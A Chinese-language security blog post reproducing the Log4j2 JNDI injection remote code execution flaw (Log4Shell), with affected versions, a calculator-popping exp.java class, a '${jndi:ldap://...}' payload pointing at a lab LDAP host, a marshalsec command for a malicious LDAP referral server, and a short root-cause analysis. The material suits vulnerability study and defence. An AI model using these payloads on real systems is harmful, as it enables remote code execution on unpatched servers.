0x00 漏洞描述
Apache Log4j2是一个基于Java的日志记录框架。正常情况下,开发者可能会将错误信息写入日志中,可以利用此特点构造特殊的数据请求包,最终触发远程代码执行RCE漏洞。Apache Struts2、Apache Solr、Apache Druid、Apache Flink等均受影响。
0x01 受影响版本
log4j2 2.0 - log4j2 2.15.0-rc1
0x02 漏洞复现
新建maven工程,pom.xml中引入log4j2依赖:
<dependency>
<groupId>org.apache.logging.log4j</groupId>
<artifactId>log4j-core</artifactId>
<version>2.14.1</version>
</dependency>
<dependency>
<groupId>org.apache.logging.log4j</groupId>
<artifactId>log4j-api</artifactId>
<version>2.14.1</version>
</dependency>
exp.java
public class exp {
static{
try {
Runtime rt = Runtime.getRuntime();
String[] commands = {"gnome-calculator" };
Process pc = rt.exec(commands);
pc.waitFor();
} catch (Exception e) {
e.printStackTrace();
}
}
}
该exp用于弹出计算器,验证命令执行效果。
test.java
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
public class test {
public static final Logger logger = LogManager.getLogger(test.class);
public static void main(String[] args){
logger.error("${jndi:ldap://192.168.65.233:9999/exp}");
}
}
手动将exp.java生成字节码文件,并通过python搭建简易web用于外部访问:
再开一个恶意的ldap服务:
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://192.168.65.233:9001/#exp" 9999
运行test.java,可以看到ldap服务和web服务都有访问记录:
并且有计算器弹出来,命令执行成功:
${jndi:ldap://qh48j1.dnslog.cn:9999/exp}这个payload高版本的java也会进行域名解析,可以看到dns请求记录:
但是只有低版本的java才能执行命令。java版本在6u211、7u201、8u191及java11等更高版本的java中默认不能使用RMI或LDAP进行JNDI注入,因此较为安全。
0x03 漏洞分析
这次漏洞主要原因是log4j2提供的Lookup的功能,对于要输出的日志,提供了很多种查找的途径,JNDI只是其中一种。JDNI支持命名引用的方式,通过远程下载class文件来构建对象,最终造成命令执行。
这是目前JNDI Lookup方式的介绍:
其中增加了对来源class的限制。
0x04 最后
10号一早看到POC,拖到现在才发确实有些不好意思。
长按下方图片关注我们: